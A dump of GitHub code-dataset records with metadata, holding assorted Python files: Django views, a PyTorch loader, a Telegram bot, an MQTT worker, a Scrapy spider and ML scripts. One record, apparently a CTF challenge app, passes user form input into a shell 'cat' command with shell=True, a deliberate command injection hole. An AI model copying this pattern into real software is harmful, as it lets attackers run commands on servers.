\"\")\r\n file_name = request.FILES.get(\"file_name\", \"\")\r\n file_URL = request.POST.get(\"file_URL\", \"\")\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n # if all values are truthy\r\n if (project_id and title and category and description):\r\n task = Task.objects.get(id=task_id) if task_id else None\r\n project = Project.objects.get(id=project_id)\r\n resource = Resource(project=project, task=task, title=title, category=category, description=description, file_name=file_name, file_URL=file_URL)\r\n resource.save()\r\n # generate notification for other party\r\n student_profile = StudentProfile.objects.get(project=project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"NEW_RESOURCE\", new_resource=resource)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_RESOURCE\", new_resource=resource)\r\n notification.save()\r\n return HttpResponse(resource.id)\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef send_resource_message(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n resource_id = request.POST.get(\"resource_id\", \"\")\r\n resource = Resource.objects.get(id=resource_id)\r\n message = request.POST.get(\"message\", \"\")\r\n user = request.user\r\n timestamp = datetime.now()\r\n # if value is truthy\r\n if (resource and message and user and timestamp):\r\n resource_message = ResourceMessage(resource=resource, user=user, text=message, timestamp=timestamp)\r\n resource_message.save()\r\n student_profile = StudentProfile.objects.get(project=resource.project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"CHAT_RESOURCE\", chat_resource=resource)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"CHAT_RESOURCE\", chat_resource=resource)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)", "repo_name": "sunram32/FYP-progress-monitoring", "sub_path": "PMS/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 21478, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 30, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 57, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 64, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 69, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 70, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 70, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 75, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 79, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 155, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 189, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 201, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 205, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 219, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 227, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 229, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 233, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 239, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 239, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 253, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 255, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 259, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 263, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 272, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 278, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 289, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 291, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 308, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 308, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 310, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 319, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 326, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 347, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 347, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 351, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 354, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 364, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 364, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 368, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 371, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 383, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 383, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 387, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 395, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 408, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 433, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 435, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 439, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 445, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 445, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 459, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 461, "usage_type": "call"}]}
+{"seq_id": "12086272813", "text": "import cv2\nimport os\nimport torch\nfrom torch.utils.data import Dataset\nimport random\nimport numpy as np\nfrom train_pipeline.utils.edge_detector.edge_detector import EdgeDetector\n\n\ndef load_image(path):\n img = cv2.imread(path, 1)\n if img is None:\n print('IMAGGGGGGG', path)\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n\nclass ImagenetLoader(Dataset):\n def __init__(self, folder_path, size=(224, 224)):\n self.images_pathes = [\n os.path.join(\n os.path.join(folder_path, subfolder_name),\n img_name\n )\n for subfolder_name in os.listdir(\n folder_path\n )\n for img_name in os.listdir(\n os.path.join(folder_path, subfolder_name)\n )\n ]\n\n self.size = size\n\n self.edge_detector = EdgeDetector()\n\n def __len__(self):\n return len(self.images_pathes)\n\n def __getitem__(self, idx):\n image = load_image(self.images_pathes[idx])\n image = cv2.resize(image, self.size)\n edge = self.edge_detector.detect(image)\n\n image = image.transpose(2, 0, 1)\n\n return torch.FloatTensor(image) / 255.0 - 0.5, \\\n torch.FloatTensor(edge).unsqueeze(0) / 255.0 - 0.5\n", "repo_name": "AlexeySrus/DeepFeaturesTransfer", "sub_path": "train_pipeline/utils/dataset_generator.py", "file_name": "dataset_generator.py", "file_ext": "py", "file_size_in_byte": 1264, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "train_pipeline.utils.edge_detector.edge_detector.EdgeDetector", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "25132600819", "text": "#!/usr/bin/python3\n\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport random\nimport os\nfrom model import Model\nimport settings\n\n\nmodel = Model.from_pickles(settings.MODEL_FILE, settings.VECTORIZER_FILE)\n\n\ndef random_word(words):\n if len(words) > 0:\n return words[random.randint(0, len(words) - 1)].lower()\n else:\n return None\n\n\ndef send_meme(update, context):\n if update.message.text is None or update.message.text.startswith('/'):\n return\n update.message.reply_text(model.get_santa_answer(update.message.text))\n\n\ndef send_help(update, context):\n update.message.reply_text('2020 was very hard for Santa too. Tell this bot about your year and he will decide if '\n 'your deserve a present')\n\n\nif __name__ == '__main__':\n updater = Updater(os.environ['TELEGRAM_TOKEN'], use_context=True)\n\n updater.dispatcher.add_handler(CommandHandler('start', send_help))\n updater.dispatcher.add_handler(CommandHandler('help', send_help))\n updater.dispatcher.add_handler(MessageHandler(Filters.all, send_meme))\n\n updater.start_polling()\n updater.idle()\n", "repo_name": "butikov/santas-little-helper", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.Model.from_pickles", "line_number": 10, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 10, "usage_type": "name"}, {"api_name": "settings.MODEL_FILE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "settings.VECTORIZER_FILE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 15, "usage_type": "call"}, {"api_name": "model.get_santa_answer", "line_number": 23, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.all", "line_number": 36, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "31633058276", "text": "#!/usr/bin/env python\n\nimport logging\nimport json\nimport paho.mqtt.client as mqtt\n\nfrom wetware.worker import Worker\nfrom wetware.worker import ApolloConnection\n\nfrom wetware.neuron import Statements\n\nclass WetwareWorker(Worker):\n\n def __init__(self, subclass_section):\n super(WetwareWorker, self).__init__(subclass_section)\n\n self.mqtt_client = mqtt.Client()\n self.mqtt_client.on_connect = self.mqtt_on_connect\n self.mqtt_client.on_message = self.mqtt_on_message\n\n def mqtt_run(self):\n self.mqtt_client.connect(self.args['mqtt_host'], self.args['mqtt_port'])\n self.mqtt_client.loop_forever()\n\n def run(self):\n with ApolloConnection(self.args) as self.apollo_conn:\n self.mqtt_run()\n\n def mqtt_on_connect(self, client, userdata, flags, rc):\n self.mqtt_client.subscribe(\"global/#\")\n\n def mqtt_on_message(self, client, userdata, message):\n if (message.topic.endswith(\"/gps\")):\n self.parse_gps_data(json.loads(message.payload))\n elif (message.topic.endswith(\"/sensortag\")):\n self.parse_sensortag_data(json.loads(message.payload))\n elif (message.topic.endswith(\"/grove\")):\n self.parse_grove_data(json.loads(message.payload))\n\n def parse_gps_data(self, message):\n node = message['clientname']\n lat = message['latitude']\n lon = message['longitude']\n #lists get converted to Geoshapes by Neuron\n lat_lon = [lat, lon]\n logging.info(\"{0}: location: {1}\".format(node, lat_lon))\n statements = Statements()\n statements.add_vertex_property(node, \"location\", lat_lon)\n self.publish(statements)\n\n def parse_sensortag_data(self, message):\n \"\"\"Lots of data here, but let's just get the temperature\n \"\"\"\n node = message['clientname']\n ir_temp = message['ir_temp']\n ambient_temp = ir_temp['ambient_temp']\n target_temp = ir_temp['target_temp']\n logging.info(\"{0}: ambient_temp: {1}, target_temp: {2}\".format(node, ambient_temp, target_temp))\n statements = Statements()\n statements.add_vertex_property(node, \"ambient_temp\", ambient_temp)\n statements.add_vertex_property(node, \"target_temp\", target_temp)\n self.publish(statements)\n\n def parse_grove_data(self, message):\n \"\"\"This is the alcohol sensor\n \"\"\"\n node = message['clientname']\n sensors = message['sensors']\n for sensor in sensors:\n if sensor['name'] == \"Alcohol\":\n alcohol = sensor['value']\n break\n if alcohol:\n logging.info(\"{0}: alcohol: {1}\".format(node, alcohol))\n statements = Statements()\n statements.add_vertex_property(node, \"alcohol\", alcohol)\n self.publish(statements)\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n wetware_worker = WetwareWorker(\"wetware\")\n wetware_worker.run()\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "dahanks/cortex", "sub_path": "wetware-py/modules/ngfr-sensors/ngfr-sensors-vanilla.py", "file_name": "ngfr-sensors-vanilla.py", "file_ext": "py", "file_size_in_byte": 2994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wetware.worker.Worker", "line_number": 12, "usage_type": "name"}, {"api_name": "paho.mqtt.client.Client", "line_number": 17, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 17, "usage_type": "name"}, {"api_name": "wetware.worker.ApolloConnection", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 46, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 80, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 80, "usage_type": "attribute"}]}
+{"seq_id": "22559196175", "text": "from flask import Flask, jsonify, request, render_template \nimport sqlite3\nimport json\nimport random\n\n\napp = Flask(__name__) \n\n@app.route('/test',methods=['POST'])\ndef test():\n if request.method == 'POST':\n user = request.get_json(force=True)\n print(user)\n print('success')\n return 'success'\nif __name__ == '__main__': \n app.run(debug = True) ", "repo_name": "KushGrandhi/Polaroid", "sub_path": "ML/MozoHack/backapi/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "20540843467", "text": "from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.utils import extract_price_eu\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nclass HomeenterSpider(BaseSpider):\n name = 'homeenter.com'\n allowed_domains = ['homeenter.com']\n start_urls = ['http://www.homeenter.com/33131/']\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n categories = hxs.select('//*[@class=\"mainarea\"]//div/a[contains(text(), \"Se fler\")]')\n for cat in categories:\n yield Request(urljoin_rfc(base_url, cat.select('@href').extract()[0]),\n callback=self.parse_pages,\n meta={'category': cat.select('text()').re(r'Se fler (.*)')[0].replace('>>>', '').strip()})\n\n def parse_pages(self, response):\n hxs = HtmlXPathSelector(response)\n\n for product in hxs.select('//a/img[@class=\"PIWC\"]/../@href').extract():\n yield Request(urljoin_rfc(get_base_url(response), product), callback=self.parse_product, meta=response.meta)\n\n def parse_product(self, response):\n import re\n hxs = HtmlXPathSelector(response)\n loader = ProductLoader(item=Product(), selector=hxs)\n\n loader.add_value('identifier', [x for x in response.url.split('?')[0].split('/') if x][-1])\n loader.add_value('url', response.url)\n loader.add_xpath('name', '//h1/text()')\n sku = ''.join(hxs.select('//h1/text()').extract())\n try:\n loader.add_value('sku', re.search('(\\d{3}\\d*)', sku).groups()[0])\n except:\n self.log('No SKU for %s' % (response.url))\n loader.add_value('price', extract_price_eu(hxs.select('//b[@class=\"priceFPNormal_special\"]/text()')[0].extract()))\n loader.add_value('category', response.meta.get('category'))\n\n img = hxs.select('//a[@id=\"mbpicturepos0\"]/@href').extract()\n if img:\n loader.add_value('image_url', urljoin_rfc(get_base_url(response), img[0]))\n\n loader.add_value('brand', 'lego')\n# loader.add_value('shipping_cost', '49')\n# loader.add_value('stock', '0')\n\n yield loader.load_item()\n", "repo_name": "Godsoo/scraping", "sub_path": "e-commerce/CompetitorMonitor/product_spiders/spiders/lego_sw/homeenter_com.py", "file_name": "homeenter_com.py", "file_ext": "py", "file_size_in_byte": 2382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 10, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 17, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 26, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 33, "usage_type": "call"}, {"api_name": "product_spiders.items.ProductLoaderWithNameStrip", "line_number": 34, "usage_type": "call"}, {"api_name": "product_spiders.items.Product", "line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "product_spiders.utils.extract_price_eu", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 49, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "40398625113", "text": "import subprocess\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return '''\n VSauce Quotes \n You can choose from 3 text files which contain VSauce quotes.
\n quote1.txt, quote2.txt, and quote3.txt
\n \n '''\n\n@app.route('/read', methods=['POST'])\ndef read():\n selected_quote = request.form['quote']\n\n linux_command = f'cat quotes/{selected_quote}' # create the linux command to find the specific word(s) in the text provided\n result = subprocess.run(linux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # run the linux command on the server\n\n if result.returncode != 0: # if there was an error when the linux command was executed\n return result.stderr, 500\n \n return result.stdout.decode('utf-8') # return the output of the ran linux command\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False)\n", "repo_name": "uocybersec/first-event-challenges", "sub_path": "lvl1/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "subprocess.run", "line_number": 23, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 23, "usage_type": "attribute"}]}
+{"seq_id": "20977419600", "text": "from flask import Flask, render_template, request\nimport base64\nimport tensorflow\nimport numpy as np\nimport cv2 \n\ndef resize(image):\n rs = np.zeros((500,500,3),dtype=np.uint8)\n height = image.shape[0]\n width = image.shape[1]\n rs[:height,:width] = image\n new_array = np.expand_dims(rs, axis=0)\n return new_array\n\ndef preprocess_image(image_data):\n # Decode image from bytes and convert it to a NumPy array\n image = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n # Perform any necessary preprocessing (e.g., resizing, normalization)\n image = resize(image)\n return image\n\napp = Flask(__name__)\n\n# # load model\n# model = joblib.load('model/cat_dog.pkl')\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if 'image' not in request.files:\n return 'No file part', 400\n\n file = request.files['image']\n \n if file.filename == '':\n return 'No selected file', 400\n \n new_model = tensorflow.keras.models.load_model('model/my_model')\n image_data = file.read()\n rs_image = preprocess_image(image_data)\n pred = new_model.predict(rs_image).argmax()\n \n prediction = \"Dogs\" if pred == 1 else \"Cats\"\n image_data = base64.b64encode(image_data).decode(\"utf-8\")\n return render_template(\"result.html\", prediction=prediction, img = image_data)\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n ", "repo_name": "Quanhcmus/dog-cat-classfication", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1467, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.zeros", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "32740891907", "text": "import torch\nfrom KalmanNet_sysmdl import SystemModel\nfrom Pipeline_EKF import Pipeline_EKF\nfrom KalmanNet_nn import KalmanNetNN\nfrom model import f, h_full, h_partial, h_nonlinear\nimport datetime\nfrom datetime import date\nimport numpy as np\nimport os\n\nif torch.cuda.is_available():\n dev = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n print(\"Running on the GPU\")\nelse:\n dev = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n\nROOT_PATH = \"/content/drive/MyDrive/KalmanNet_Visual/KalmanNet_VO/\"\nROOT_PATH = r\"C:\\Users\\damis\\KalmanNetDrive\\KalmanNet_Visual\\KalmanNet_VO/\"\ntorch.manual_seed(42)\n\nv = 0\nq2 = 1\nr2 = 1\nm = 2\nn = 2\nh = h_full\nT = 400\nT_test = 400\nm1x_0 = torch.Tensor([[0.0], [0.0]]).to(dev)\nm2x_0 = torch.eye(m).to(dev)\nEPOCHS = 20\nBATCH_SIZE = 10\nLR = 1e-3\nWD = 1e-4\n\ntoday = date.today()\nnow = datetime.datetime.now()\nstrToday = today.strftime(\"%m.%d.%y\")\nstrNow = now.strftime(\"%H:%M:%S\")\nstrTime = strToday + \"_\" + strNow\nprint(\"Current Time =\", strTime)\n\n\nQ_true = q2 * torch.eye(m)\nR_true = r2 * torch.eye(n)\nsys_model = SystemModel(f, Q_true, h, R_true, T, T_test)\nsys_model.InitSequence(m1x_0, m2x_0)\n\n\nq = np.sqrt(q2)\nr = np.sqrt(r2)\ninput_ = np.load(ROOT_PATH+f\"Datasets/Pendulum/decimated_noisy_data/pendulum_decimated_noisy_q2_{q2:.0e}_r2_{r2:.0e}_v{v}.npz\")\ntarget_ = np.load(ROOT_PATH+f\"Datasets/Pendulum/decimated_clean_data/pendulum_decimated_q2_{q2:.0e}_v_{v}.npz\")\ntrain_input = torch.from_numpy(input_[\"training_set\"][:100, :, :]).float().to(dev)\ntrain_target = torch.from_numpy(target_[\"training_set\"][:100, :, :]).float().to(dev)\ntest_input = torch.from_numpy(input_[\"test_set\"][:, :, :]).float().to(dev)\ntest_target = torch.from_numpy(target_[\"test_set\"]).float().to(dev)\ncv_input = torch.from_numpy(input_[\"validation_set\"][:100, :, :]).float().to(dev)\ncv_target = torch.from_numpy(target_[\"validation_set\"][:100, ...]).float().to(dev)\nprint(train_input.shape, train_target.shape, cv_input.shape, cv_target.shape)\n\n\n\n\nmodelFolder = ROOT_PATH + \"Simulations_results/Pendulum/KalmanNet\"\nos.makedirs(modelFolder, exist_ok=True)\nKNet_Pipeline = Pipeline_EKF(strTime, modelFolder, \"KNet_vectorial\")\nKNet_Pipeline.setssModel(sys_model)\nKNet_model = KalmanNetNN()\nKNet_model.Build(sys_model)\nKNet_Pipeline.setModel(KNet_model)\nKNet_Pipeline.setTrainingParams(n_Epochs=EPOCHS, n_Batch=BATCH_SIZE, learningRate=LR, weightDecay=WD)\n\n# KNet_Pipeline.model = torch.load(modelFolder+\"model_KNet.pt\")\n\"\"\"\nKNet_Pipeline.NNTrain(train_input, train_target, cv_input, cv_target)\n[KNet_MSE_test_linear_arr, KNet_MSE_test_linear_avg, KNet_MSE_test_dB_avg, KNet_test] = KNet_Pipeline.NNTest(test_input, test_target)\nKNet_Pipeline.save()\nnp.savez(modelFolder+f\"result_{q2:.0e}_{r2:.0e}_v{v}.npz\", MSE_linear_arr = KNet_MSE_test_linear_arr.cpu(), MSE_linear_avg=KNet_MSE_test_linear_avg.cpu(),\n MSE_dB_avg=KNet_MSE_test_dB_avg.cpu(), output=KNet_test.cpu())\n\"\"\"\nKNet_Pipeline.model.InitSequence(KNet_Pipeline.ssModel.m1x_0, KNet_Pipeline.ssModel.T)\n\ninput = train_input[0, :, :]\nout = KNet_Pipeline.model(input[:, 6])\nprint(out)\nprint(out.shape)", "repo_name": "stegerd/KalmanNet_with_visual_observation", "sub_path": "KNet_original_code/prova.py", "file_name": "prova.py", "file_ext": "py", "file_size_in_byte": 3172, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.set_default_tensor_type", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 21, "usage_type": "call"}, {"api_name": "model.h_full", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 32, 